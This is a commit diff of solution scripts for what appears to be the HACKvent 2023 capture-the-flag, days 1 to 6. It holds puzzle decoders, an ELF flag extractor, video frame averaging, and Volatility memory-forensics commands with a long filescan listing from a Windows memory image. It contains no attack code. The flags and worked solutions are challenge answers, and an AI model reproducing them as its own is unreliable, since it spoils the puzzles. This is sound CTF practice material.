Initial Commit Day 1-9

Day 1/decode.py

@@ -0,0 +1,32 @@
+import string
+from bs4 import BeautifulSoup
+from PIL import Image
+from pyzbar.pyzbar import decode
+
+qr_size = 25
+pix_size = 10
+img_size = pix_size * qr_size
+
+with open("templates/santa.j2", "r") as f:
+    soup = BeautifulSoup(f.read(), "html.parser")
+    img = Image.new("RGB", (img_size, img_size), "white")
+    y = 0
+
+    for c in string.ascii_lowercase:
+        bin_str = ""
+        x = 0
+        for e in soup.find_all("span"):
+            if e.text.strip() == "{{" + c + "}}":               
+                if "a" in e["class"]:
+                    color = (0, 0, 0)
+                else:
+                    color = (255, 255, 255)
+
+                for xi in range(x, x+pix_size):
+                    for yi in range(y, y+pix_size):
+                        img.putpixel((xi, yi), color)
+
+                x += pix_size
+        y += pix_size
+
+    print("[+] Flag:", decode(img)[0].data.decode())

Day 2/decode.py

@@ -0,0 +1,3 @@
+data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
+# "PGP++++" -> Philip Zimmerman 
+print("[+] Flag: HV23{Philip Zimmerman}")

Day 3/decode.py

@@ -0,0 +1,58 @@
+data = [
+    ["8","c","t","k","3"],
+    ["2","r","H","V","r"],
+    ["2","y",None,"0","v"],
+    ["2","e","n","3","_"],
+    ["}","3","h","{","m"],
+]
+
+def find_char(c, min=(0, 0)):
+    for x, row in enumerate(data):
+        for y, v in enumerate(row):
+            if v == c and (x, y) >= min:
+                return (x, y)
+        
+
+def find_key(cirb="HV23{"):
+    min = (0, 0)
+    key = []
+    for c in cirb:
+        key.append(find_char(c, min))
+        min = key[-1]
+    key[3] = (4, 1) # or (3, 3)
+    key.append(rotate(find_char('}'), 3)) # for final '}'
+    return key
+
+def rotate(key, rotation):
+    rotation = rotation % 4
+    if rotation == 0:
+        return key        
+    
+    n = len(data) - 1
+    rotated = []
+
+    if isinstance(key, list):
+        for (x, y) in key:
+            rotated.append((y, n - x))
+    else:
+        rotated = (key[1], n - key[0])
+
+    if rotation > 1:
+        return rotate(rotated, rotation - 1)
+    
+    return rotated
+
+def get_text(key, rotation=0):
+    text = ""
+    key = list(sorted(rotate(key, rotation)))
+    for (x, y) in key:
+        text += data[x][y]
+    return text
+
+key = find_key()
+
+flag = ""
+for i in range(0, 4):
+    flag += get_text(key, -i)
+    
+print("[+] Flag:", flag)

Day 4/decode.py

@@ -0,0 +1,26 @@
+from hackingscripts import util
+from pwn import context, disasm
+import re
+
+if __name__ == "__main__":
+    with open("bowser.elf", "rb") as f:
+        elf = f.read()
+
+    context.arch = "amd64"
+    offset = 0x1332
+    flag = b""
+
+    for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
+        match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
+        if match:
+            flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
+        else:
+            match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
+            if match:
+                flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
+            elif re.match(r"call\s+.*", instr):
+                break
+
+    flag = flag.split(b"\x00")[1].decode()
+    print("[+] Flag:", flag)
+

Day 5/decode.py

@@ -0,0 +1,47 @@
+from PIL import Image
+import os
+import sys
+import operator
+import subprocess
+import shutil
+
+def extract_frames(destination):
+    os.makedirs(destination, exist_ok=True)
+    subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
+    print()
+
+def parse_frame(file):
+    img = Image.open(file)
+    pix = img.load()
+    return img.size, pix
+
+if __name__ == "__main__":
+    
+    output_directory = "frames"
+    pixel_sum = None
+    count = 0
+
+    extract_frames(output_directory)
+    for file in sorted(os.listdir(output_directory)):
+        if file.endswith(".png"):
+            sys.stdout.write(f"\rAnalyzing: {file}")
+            (width, height), pix = parse_frame(os.path.join(output_directory, file))
+            if pixel_sum is None:
+                pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
+
+            for x in range(width):
+                for y in range(height):
+                    pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
+            
+            count += 1
+            
+    print("\nComposing new image")
+    img = Image.new("RGB", (width, height))
+    pix = img.load()
+
+    for x in range(width):
+        for y in range(height):
+            pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
+
+    img.save(f"result.png")
+    shutil.rmtree(output_directory)

Day 6/.gitattributes

@@ -0,0 +1 @@
+memory.raw filter=lfs diff=lfs merge=lfs -text

Day 6/extract.sh

@@ -0,0 +1,3 @@
+vol -f memory.raw windows.info
+vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
+vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0

Day 6/files.txt

@@ -0,0 +1,4480 @@
+Volatility 3 Framework 2.4.1
+
+Offset	Name	Size
+
+0x918b7008ec20	\Windows\System32\drivers\mpsdrv.sys	216
+0x918b700970c0	\Sessions\1\AppContainerNamedObjects	216
+0x918b70097a20	\Windows\System32\TextInputFramework.dll	216
+0x918b706b03e0	\Windows	216
+0x918b709830a0	\$Secure:$SII:$INDEX_ALLOCATION	216
+0x918b70983210	\:$I30:$INDEX_ALLOCATION	216
+0x918b70983940	\$Directory	216
+0x918b70983c20	\$Mft	216
+0x918b70984070	\$BitMap	216
+0x918b709841e0	\$MftMirr	216
+0x918b709847a0	\$LogFile	216
+0x918b70984910	\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002	216
+0x918b70984a80	\$Mft::$BITMAP	216
+0x918b70984d60	\$Secure:$SDS:$DATA	216
+0x918b70a03380	\Windows\System32\vertdll.dll	216
+0x918b70a034f0	\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf	216
+0x918b70a03d90	\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001	216
+0x918b70a041e0	\$Extend\$RmMetadata\$Repair:$Verify:$DATA	216
+0x918b70a04350	\$Extend:$I30:$INDEX_ALLOCATION	216
+0x918b70a044c0	\$Extend\$RmMetadata\$Repair:$Corrupt:$DATA	216
+0x918b70a04630	\$Extend\$Deleted:$I30:$INDEX_ALLOCATION	216
+0x918b70a047a0	\$Extend\$UsnJrnl:$J:$DATA	216
+0x918b70a04910	\$Extend\$RmMetadata\$Repair	216
+0x918b70a04a80	\Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b70a04bf0	\$Directory	216
+0x918b70a620a0	\$Directory	216
+0x918b70a62210	\$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION	216
+0x918b70a62380	\Windows\System32\drivers\vmusbmouse.sys	216
+0x918b70a624f0	\$NonCachedIo	216
+0x918b70a62c20	\Windows\System32\drivers\dumpfve.sys	216
+0x918b70a63350	\$Extend\$RmMetadata\$TxfLog\$Tops:$T:$DATA	216
+0x918b70a634c0	\$Extend\$RmMetadata\$TxfLog\$Tops	216
+0x918b70a63630	\:$I30:$INDEX_ALLOCATION	216
+0x918b70a637a0	\Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b70a63910	\Device\HarddiskVolume4\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b70a63a80	TxfLog	216
+0x918b70a63bf0	KtmLog	216
+0x918b70a63ed0	\$Extend\$Reparse:$R:$INDEX_ALLOCATION	216
+0x918b70a6d210	\Windows\System32\ntdll.dll	216
+0x918b70a6d380	\Windows\SysWOW64\ntdll.dll	216
+0x918b70a6d4f0	\$Directory	216
+0x918b70a6d7d0	\Windows\System32\drivers\cdrom.sys	216
+0x918b70a6dd90	\$Directory	216
+0x918b70a6e070	\$Directory	216
+0x918b70a6e1e0	\Windows\System32\drivers\lsi_sas.sys	216
+0x918b70a6e4c0	\$Directory	216
+0x918b70a6e630	\$Directory	216
+0x918b70a6e910	\Windows\System32\drivers\Diskdump.sys	216
+0x918b70a6ea80	\Windows\System32\drivers\crashdmp.sys	216
+0x918b70a91220	\Windows\System32\drivers\dxgkrnl.sys	216
+0x918b70a917e0	\Windows\System32\drivers\filecrypt.sys	216
+0x918b70a91ac0	\Windows\System32\drivers\watchdog.sys	216
+0x918b70a927b0	\Windows\System32\drivers\null.sys	216
+0x918b70a92d70	\Windows\System32\drivers\hidusb.sys	216
+0x918b70a93330	\Windows\System32\drivers\hidclass.sys	216
+0x918b70a93780	\$Directory	216
+0x918b70a93a60	\Windows\System32\drivers\hidparse.sys	216
+0x918b70a93bd0	\Windows\System32\drivers\tbs.sys	216
+0x918b70a93d40	\Windows\System32\drivers\beep.sys	216
+0x918b70a94470	\Windows\System32\DriverStore\FileRepository\basicdisplay.inf_amd64_25ab9510fd18cfda\BasicDisplay.sys	216
+0x918b70a945e0	\$Directory	216
+0x918b70a94a30	\Windows\System32\drivers\mouhid.sys	216
+0x918b70a94ba0	\Windows\System32\drivers\mouclass.sys	216
+0x918b70a94d10	\Windows\System32\drivers\Vid.sys	216
+0x918b70f065c0	\Windows\System32\drivers\monitor.sys	216
+0x918b70fd7390	\Windows\System32\DriverStore\FileRepository\umbus.inf_amd64_0a69be6a385b49f7\umbus.sys	216
+0x918b70fd77e0	\Windows\System32\drivers\battc.sys	216
+0x918b70fd7950	\Windows\System32\drivers\kdnic.sys	216
+0x918b70fd7da0	\Windows\System32\drivers\intelppm.sys	216
+0x918b70fd8080	\Windows\System32\drivers\e1i65x64.sys	216
+0x918b70fd84d0	\Windows\System32\drivers\kbdclass.sys	216
+0x918b70fd8640	\Windows\System32\drivers\vmmouse.sys	216
+0x918b70fd87b0	\Windows\System32\drivers\winhvr.sys	216
+0x918b70fd8d70	\Windows\System32\drivers\i8042prt.sys	216
+0x918b70fd8ee0	\Windows\System32\drivers\vm3dmp.sys	216
+0x918b70fd9330	\Windows\System32\drivers\vm3dmp_loader.sys	216
+0x918b70fd98f0	\Windows\System32\drivers\vmgencounter.sys	216
+0x918b70fd9bd0	\Windows\System32\DriverStore\FileRepository\compositebus.inf_amd64_160f98ccef202f85\CompositeBus.sys	216
+0x918b70fd9d40	\Windows\System32\drivers\CmBatt.sys	216
+0x918b70fda190	\Windows\System32\DriverStore\FileRepository\basicrender.inf_amd64_9ff437f462543a42\BasicRender.sys	216
+0x918b70fda470	\Windows\System32\drivers\NdisVirtualBus.sys	216
+0x918b70fdaa30	\Windows\System32\drivers\mssmbios.sys	216
+0x918b70fdad10	\Windows\System32\DriverStore\FileRepository\swenum.inf_amd64_9ebb9a8726114d22\swenum.sys	216
+0x918b740020b0	\Windows\System32\drivers\afunix.sys	216
+0x918b74002950	\Windows\System32\drivers\rdpbus.sys	216
+0x918b74002c30	\Windows\System32\drivers\afd.sys	216
+0x918b740031f0	\Windows\System32\drivers\vwififlt.sys	216
+0x918b740034d0	\Windows\System32\drivers\ws2ifsl.sys	216
+0x918b74003920	\Windows\System32\drivers\npfs.sys	216
+0x918b74003c00	\Windows\System32\drivers\tdi.sys	216
+0x918b74003d70	\Windows\System32\drivers\netbt.sys	216
+0x918b74003ee0	\Windows\System32\drivers\ks.sys	216
+0x918b740041c0	\Windows\System32\drivers\msfs.sys	216
+0x918b74004bd0	\Windows\System32\drivers\tdx.sys	216
+0x918b74004eb0	\Windows\System32\drivers\pacer.sys	216
+0x918b740055e0	\Windows\System32\drivers\netbios.sys	216
+0x918b74005750	\Windows\System32\drivers\rdbss.sys	216
+0x918b74005d10	\Windows\System32\drivers\nsiproxy.sys	216
+0x918b740cd220	\Windows\System32\smss.exe	216
+0x918b740cd500	\Windows\System32\drivers\gpuenergydrv.sys	216
+0x918b740ce1f0	\Windows\System32\drivers\dfsc.sys	216
+0x918b740ce7b0	\Windows\System32\drivers\fastfat.sys	216
+0x918b740ceee0	\Windows\System32\drivers\npsvctrig.sys	216
+0x918b740cf330	\Windows\System32\drivers\bam.sys	216
+0x918b740cf610	\Windows\System32\drivers\ahcache.sys	216
+0x918b740d0e80	\$Directory	216
+0x918b740d73e0	\Windows\System32\msvcrt.dll	216
+0x918b740d7700	\Windows\System32\shell32.dll	216
+0x918b740d7890	\Windows\System32\advapi32.dll	216
+0x918b740d7a20	\Windows\System32\SHCore.dll	216
+0x918b740d7bb0	\Windows\System32\wow64win.dll	216
+0x918b740d7d40	\Windows\System32\wow64cpu.dll	216
+0x918b740d7ed0	\Windows\System32\normaliz.dll	216
+0x918b740d81f0	\Windows\System32\gdi32.dll	216
+0x918b740d8510	\Windows\System32\comdlg32.dll	216
+0x918b740d86a0	\Windows\System32\oleaut32.dll	216
+0x918b740d8830	\Windows\System32\ws2_32.dll	216
+0x918b740d89c0	\Windows\System32\nsi.dll	216
+0x918b740d8b50	\Windows\System32\wow64.dll	216
+0x918b740d8ce0	\Windows\System32\difxapi.dll	216
+0x918b740d8e70	\Windows\System32\setupapi.dll	216
+0x918b740f7510	\$Directory	216
+0x918b740f7680	\$Directory	216
+0x918b740f84e0	\$Directory	216
+0x918b740f8d80	\$Directory	216
+0x918b742f1250	\Windows\System32\cfgmgr32.dll	216
+0x918b742f13e0	\Windows\System32\msctf.dll	216
+0x918b742f1570	\Windows\System32\psapi.dll	216
+0x918b742f1700	\Windows\System32\ole32.dll	216
+0x918b742f1890	\Windows\System32\GdiPlus.dll	216
+0x918b742f1a20	\Windows\System32\imagehlp.dll	216
+0x918b742f1bb0	\Windows\System32\rpcrt4.dll	216
+0x918b742f1d40	\Windows\System32\Wldap32.dll	216
+0x918b742f1ed0	\Windows\System32\clbcatq.dll	216
+0x918b742f21f0	\Windows\System32\coml2.dll	216
+0x918b742f2380	\Windows\System32\imm32.dll	216
+0x918b742f2510	\Windows\System32\KernelBase.dll	216
+0x918b742f26a0	\Windows\System32\win32u.dll	216
+0x918b742f2830	\Windows\System32\kernel32.dll	216
+0x918b742f29c0	\Windows\System32\combase.dll	216
+0x918b742f2ce0	\Windows\System32\windows.storage.dll	216
+0x918b742f2e70	\Windows\System32\bcryptprimitives.dll	216
+0x918b7433a0c0	\Windows\SysWOW64\msasn1.dll	216
+0x918b7433a250	\Windows\SysWOW64\setupapi.dll	216
+0x918b7433a3e0	\Windows\System32\comctl32.dll	216
+0x918b7433a570	\Windows\System32\wintrust.dll	216
+0x918b7433a700	\Windows\System32\ucrtbase.dll	216
+0x918b7433a890	\Windows\System32\crypt32.dll	216
+0x918b7433aa20	\Windows\System32\msasn1.dll	216
+0x918b7433abb0	\Windows\System32\profapi.dll	216
+0x918b7433ad40	\Windows\System32\bcrypt.dll	216
+0x918b7433aed0	\Windows\SysWOW64\difxapi.dll	216
+0x918b7433b1f0	\Windows\SysWOW64\coml2.dll	216
+0x918b7433b380	\Windows\System32\powrprof.dll	216
+0x918b7433b510	\Windows\System32\umpdc.dll	216
+0x918b7433b6a0	\Windows\SysWOW64\powrprof.dll	216
+0x918b7433b830	\Windows\SysWOW64\msvcrt.dll	216
+0x918b7433b9c0	\Windows\SysWOW64\comdlg32.dll	216
+0x918b7433b9f0	멈琳醋￿멈琳醋￿	0
+0x918b7433bb50	\Windows\System32\cryptsp.dll	216
+0x918b7433bce0	\Windows\System32\gdi32full.dll	216
+0x918b7433be70	\Windows\System32\kernel.appcore.dll	216
+0x918b74343250	\Windows\SysWOW64\wintrust.dll	216
+0x918b743433e0	\Windows\SysWOW64\shlwapi.dll	216
+0x918b74343570	\Windows\SysWOW64\GdiPlus.dll	216
+0x918b74343700	\Windows\SysWOW64\kernel.appcore.dll	216
+0x918b74343890	\Windows\SysWOW64\cryptsp.dll	216
+0x918b74343a20	\Windows\SysWOW64\windows.storage.dll	216
+0x918b74343bb0	\Windows\SysWOW64\oleaut32.dll	216
+0x918b74343d40	\Windows\SysWOW64\normaliz.dll	216
+0x918b74343ed0	\Windows\SysWOW64\ucrtbase.dll	216
+0x918b743441f0	\Windows\SysWOW64\umpdc.dll	216
+0x918b74344380	\Windows\SysWOW64\msvcp_win.dll	216
+0x918b74344510	\Windows\SysWOW64\win32u.dll	216
+0x918b743446a0	\Windows\SysWOW64\imagehlp.dll	216
+0x918b74344830	\Windows\SysWOW64\cfgmgr32.dll	216
+0x918b743449c0	\Windows\SysWOW64\SHCore.dll	216
+0x918b74344b50	\Windows\SysWOW64\kernel32.dll	216
+0x918b74344ce0	\Windows\SysWOW64\gdi32full.dll	216
+0x918b7436a260	\Windows\System32\sxssrv.dll	216
+0x918b7436a3f0	\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_app.dll	216
+0x918b7436a580	\Windows\System32\dbghelp.dll	216
+0x918b7436a710	\Sessions\0\AppContainerNamedObjects	216
+0x918b7436a8a0	\Windows\System32\en-US\win32kbase.sys.mui	216
+0x918b7436aa30	\Windows\System32\win32kfull.sys	216
+0x918b7436abc0	\$Directory	216
+0x918b7436ad50	\Windows\System32\win32kbase.sys	216
+0x918b7436aee0	\Windows\System32\winsrv.dll	216
+0x918b7436b200	\Windows\System32\csrss.exe	216
+0x918b7436b390	\Windows\System32\csrsrv.dll	216
+0x918b7436b520	\Windows\System32	216
+0x918b7436b6b0	\Windows\System32\en-US\csrss.exe.mui	216
+0x918b7436b9d0	\CMApi	216
+0x918b7436bcf0	\Windows\System32\basesrv.dll	216
+0x918b7436be80	\Windows\System32\en-US\winsrv.dll.mui	216
+0x918b7436c1a0	\Windows\System32\locale.nls	216
+0x918b7436c330	\Windows\System32\winsrvext.dll	216
+0x918b7436c4c0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b7436c650	\Windows\System32\drivers\dxgmms2.sys	216
+0x918b7436c970	\$Directory	216
+0x918b7436cb00	\$Directory	216
+0x918b7436ce20	\Windows\System32\wininit.exe	216
+0x918b7436d140	\Windows\System32\csrss.exe	216
+0x918b7436d2d0	\Windows\System32	216
+0x918b7436d460	\Windows\System32\sspicli.dll	216
+0x918b7436d780	\$Directory	216
+0x918b7436d910	\Windows\System32	216
+0x918b7436daa0	\Windows\System32\wininitext.dll	216
+0x918b7436dc30	\Windows\System32\userenv.dll	216
+0x918b743710d0	\EFI\Microsoft\Boot\BCD.LOG	216
+0x918b74371260	\ProtectedPrefix	216
+0x918b743713f0	\ProtectedPrefix\LocalService	216
+0x918b74371580	\Windows\System32\config\SYSTEM	216
+0x918b74371710	\Sessions	216
+0x918b743718a0	\ProtectedPrefix\LocalService	216
+0x918b74371a30	\Windows\System32\config\SYSTEM.LOG2	216
+0x918b74371bc0	\Windows\System32\config\SECURITY	216
+0x918b74371d50	\Windows\System32\config\SECURITY.LOG2	216
+0x918b74371ee0	\Windows\SysWOW64\sspicli.dll	216
+0x918b74372200	\ProtectedPrefix\Administrators	216
+0x918b74372390	\Windows\SysWOW64\cryptbase.dll	216
+0x918b743726b0	\$Directory	216
+0x918b74372840	\Windows\System32\config\SYSTEM.LOG1	216
+0x918b743729d0	\Windows\SysWOW64\iertutil.dll	216
+0x918b74372b60	\Windows\System32\config\SECURITY.LOG1	216
+0x918b74372cf0	\Windows\bootstat.dat	216
+0x918b74372e80	\Windows\System32\config\SOFTWARE.LOG1	216
+0x918b743734c0	\Windows\System32\config\DEFAULT	216
+0x918b74373650	\EFI\Microsoft\Boot\BCD	216
+0x918b743737e0	\ProtectedPrefix\NetWorkService	216
+0x918b74373970	\ProtectedPrefix\NetWorkService	216
+0x918b74373b00	\Windows\System32\config\SOFTWARE	216
+0x918b74373c90	\Windows\System32\config\SOFTWARE.LOG2	216
+0x918b74373e20	\ProtectedPrefix\Administrators	216
+0x918b74374140	\ProtectedPrefix	216
+0x918b743742d0	\Windows\System32\config\SAM	216
+0x918b743745f0	\Windows\System32\config\DEFAULT.LOG1	216
+0x918b74374780	\Windows\System32\win32k.sys	216
+0x918b74374910	:$VMCB$	216
+0x918b74374aa0	\Windows\System32\config\SAM.LOG1	216
+0x918b74374c30	\Windows\System32\config\DEFAULT.LOG2	216
+0x918b74374dc0	\Windows\System32\config\SAM.LOG2	216
+0x918b7438d370	\$Mft	216
+0x918b7438d7c0	\$MftMirr	216
+0x918b7438eec0	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventlog-Security.etl	216
+0x918b7438f1a0	\$Secure:$SII:$INDEX_ALLOCATION	216
+0x918b7438f5f0	\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001	216
+0x918b7438f760	\$BitMap	216
+0x918b7438f8d0	\$Extend\$RmMetadata\$Repair	216
+0x918b7438fa40	\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf	216
+0x918b743905c0	\$Extend\$RmMetadata\$TxfLog\$Tops	216
+0x918b74390730	\Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b743908a0	\$Extend:$I30:$INDEX_ALLOCATION	216
+0x918b74390b80	\$Extend\$Deleted:$I30:$INDEX_ALLOCATION	216
+0x918b74390cf0	\$Secure:$SDS:$DATA	216
+0x918b743912b0	\$LogFile	216
+0x918b74391420	\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002	216
+0x918b74391590	\Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b74391870	\$Mft::$BITMAP	216
+0x918b743919e0	\:$I30:$INDEX_ALLOCATION	216
+0x918b74391e30	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl	216
+0x918b74392110	\$Directory	216
+0x918b74392280	\$Secure:$SDH:$INDEX_ALLOCATION	216
+0x918b743923f0	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl	216
+0x918b74392560	\$Directory	216
+0x918b74392840	\Windows\System32\LogFiles\WMI\LwtNetLog.etl	216
+0x918b743929b0	\Windows\System32\LogFiles\WMI\NetCore.etl	216
+0x918b74392b20	\Windows\System32\LogFiles\WMI\RadioMgr.etl	216
+0x918b743930e0	\$Directory	216
+0x918b74393250	\$Directory	216
+0x918b743933c0	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-System.etl	216
+0x918b74393530	\Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog	216
+0x918b743936a0	KtmLog	216
+0x918b74393810	\:$I30:$INDEX_ALLOCATION	216
+0x918b74393980	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl	216
+0x918b74393af0	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-Application.etl	216
+0x918b74393c60	\Windows\System32\LogFiles\WMI\Microsoft-Windows-Rdp-Graphics-RdpIdd-Trace.etl	216
+0x918b74393dd0	\Windows\System32\LogFiles\WMI\NtfsLog.etl	216
+0x918b743970c0	\Windows\SysWOW64\psapi.dll	216
+0x918b74397250	\Windows\SysWOW64\comctl32.dll	216
+0x918b743973e0	\Windows\SysWOW64\ws2_32.dll	216
+0x918b74397570	\Windows\SysWOW64\advapi32.dll	216
+0x918b74397700	\Windows\SysWOW64\shell32.dll	216
+0x918b74397890	\Windows\SysWOW64\clbcatq.dll	216
+0x918b74397a20	\Windows\SysWOW64\gdi32.dll	216
+0x918b74397bb0	\Windows\SysWOW64\nsi.dll	216
+0x918b74397d40	\Windows\SysWOW64\bcrypt.dll	216
+0x918b74397ed0	\Windows\SysWOW64\ole32.dll	216
+0x918b743981f0	\Windows\SysWOW64\Wldap32.dll	216
+0x918b74398380	\Windows\SysWOW64\profapi.dll	216
+0x918b74398510	\Windows\SysWOW64\sechost.dll	216
+0x918b743986a0	\Windows\SysWOW64\combase.dll	216
+0x918b74398830	\Windows\SysWOW64\imm32.dll	216
+0x918b74398b50	\Windows\SysWOW64\crypt32.dll	216
+0x918b74398ce0	\Windows\SysWOW64\bcryptprimitives.dll	216
+0x918b74398e70	\Windows\SysWOW64\rpcrt4.dll	216
+0x918b743f80c0	\$Directory	216
+0x918b743f83a0	\Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b743f87f0	\Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms	216
+0x918b743f8c40	\SystemRoot\System32\Config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b743f8db0	\$Directory	216
+0x918b743f9200	\SystemRoot\System32\Config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b743f94e0	\$Directory	216
+0x918b743f9650	\Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms	216
+0x918b743fa620	\$Directory	216
+0x918b743faa70	\Windows\System32\LogFiles\WMI\Wifi.etl	216
+0x918b743fabe0	\Windows\System32\LogFiles\WMI\RtBackup\EtwRTUBPM.etl	216
+0x918b743fad50	\Windows\System32\WDI\LogFiles\WdiContextLog.etl.003	216
+0x918b743fb1a0	\Windows\System32\drivers\udfs.sys	216
+0x918b743fbbb0	\$ConvertToNonresident	216
+0x918b743fc170	\$ConvertToNonresident	216
+0x918b743fd590	\$ConvertToNonresident	216
+0x918b74b150d0	\Windows\System32\en-US\user32.dll.mui	216
+0x918b74b15260	\$Directory	216
+0x918b74b153f0	\$Directory	216
+0x918b74b15580	\Windows\System32\dab.dll	216
+0x918b74b15a30	\CMApi	216
+0x918b74b15bc0	\Windows\Prefetch\VMWARERESOLUTIONSET.EXE-F78A3A07.pf	216
+0x918b74b15d50	\Windows\System32\KBDUS.DLL	216
+0x918b74b16200	\Windows\System32\en-US\winlogon.exe.mui	216
+0x918b74b16390	\Windows\System32\en-US\user32.dll.mui	216
+0x918b74b169d0	\Windows\System32	216
+0x918b74b16b60	\$Directory	216
+0x918b74b16e80	\Windows\Fonts\constanb.ttf	216
+0x918b74b171a0	\Windows\Fonts\ebrimabd.ttf	216
+0x918b74b17330	\$Directory	216
+0x918b74b174c0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db	216
+0x918b74b17650	\Windows\System32	216
+0x918b74b17970	\Windows\System32\winlogon.exe	216
+0x918b74b17b00	\CMApi	216
+0x918b74b17c90	\Windows\System32\cdd.dll	216
+0x918b74b18140	\Windows\servicing\CbsMsg.dll	216
+0x918b74b18460	\InitShutdown	216
+0x918b74b185f0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b74b18780	\InitShutdown	216
+0x918b74b18910	\InitShutdown	216
+0x918b74b18c30	\wkssvc	216
+0x918b74b18dc0	\Windows\System32\upshared.dll	216
+0x918b74b3f0d0	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-4bb4d6f7cafc4e9292f972dca2dcde42-bd019ee8-e59c-4b0f-a02c-84e72157a3ef-7485.json	216
+0x918b74b3f260	\Windows\System32\ncrypt.dll	216
+0x918b74b3f3f0	\Windows\System32\joinutil.dll	216
+0x918b74b3f580	\Windows\System32\winsta.dll	216
+0x918b74b3f710	\Windows\System32\EventAggregation.dll	216
+0x918b74b3f8a0	\CMApi	216
+0x918b74b3fa30	\Windows\System32\services.exe	216
+0x918b74b3fd50	\Windows\System32	216
+0x918b74b3fee0	\Windows\System32\Windows.Storage.Compression.dll	216
+0x918b74b40200	\$Directory	216
+0x918b74b40390	\Windows\System32\sxs.dll	216
+0x918b74b40520	\Windows	216
+0x918b74b406b0	\Windows\System32\lsass.exe	216
+0x918b74b40840	\Windows\System32\samsrv.dll	216
+0x918b74b409d0	\Windows\System32\wuauclt.exe	216
+0x918b74b40a00	੘璴醋￿੘璴醋￿	0
+0x918b74b40b60	\Windows\System32\wldp.dll	216
+0x918b74b40cf0	\Windows\System32\en-US\lsasrv.dll.mui	216
+0x918b74b411a0	\Windows\System32\ntasn1.dll	216
+0x918b74b41330	\$Directory	216
+0x918b74b414c0	\Windows\System32\lsasrv.dll	216
+0x918b74b41650	\Windows\System32\msprivs.dll	216
+0x918b74b417e0	\Windows\System32\netprovfw.dll	216
+0x918b74b41970	\Windows\System32\en-US\wdmaud.drv.mui	216
+0x918b74b41b00	\Windows\Registration\R000000000006.clb	216
+0x918b74b41c90	\Windows\System32\negoexts.dll	216
+0x918b74b41e20	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms	216
+0x918b74b42140	\Windows\System32\devobj.dll	216
+0x918b74b422d0	\Windows\Globalization\Sorting\SortDefault.nls	216
+0x918b74b42460	\Windows\System32\cryptbase.dll	216
+0x918b74b425f0	\Windows\System32\kerberos.dll	216
+0x918b74b42910	\Windows\System32\cryptdll.dll	216
+0x918b74b42aa0	\Windows\System32\FirewallAPI.dll	216
+0x918b74b42c30	\Windows\System32\KerbClientShared.dll	216
+0x918b74b42dc0	\Windows\System32\mswsock.dll	216
+0x918b74bc1270	\Windows\System32\cloudAP.dll	216
+0x918b74bc1400	\Windows\System32\IPHLPAPI.DLL	216
+0x918b74bc1720	\lsass	216
+0x918b74bc18b0	\Windows\System32\efslsaext.dll	216
+0x918b74bc1a40	\Windows\System32\dpapi.dll	216
+0x918b74bc1bd0	\lsass	216
+0x918b74bc1d60	\lsass	216
+0x918b74bc1ef0	\Windows\System32\TSpkg.dll	216
+0x918b74bc2080	\Windows\System32\schannel.dll	216
+0x918b74bc2210	\Windows\System32\dpapisrv.dll	216
+0x918b74bc23a0	\Windows\System32\sspisrv.dll	216
+0x918b74bc2530	\Windows\System32\NtlmShared.dll	216
+0x918b74bc29e0	\Windows\System32\pku2u.dll	216
+0x918b74bc2b70	\Windows\System32\MicrosoftAccountCloudAP.dll	216
+0x918b74bc2d00	\Windows\System32\netutils.dll	216
+0x918b74bc2e90	\Windows\System32\wdigest.dll	216
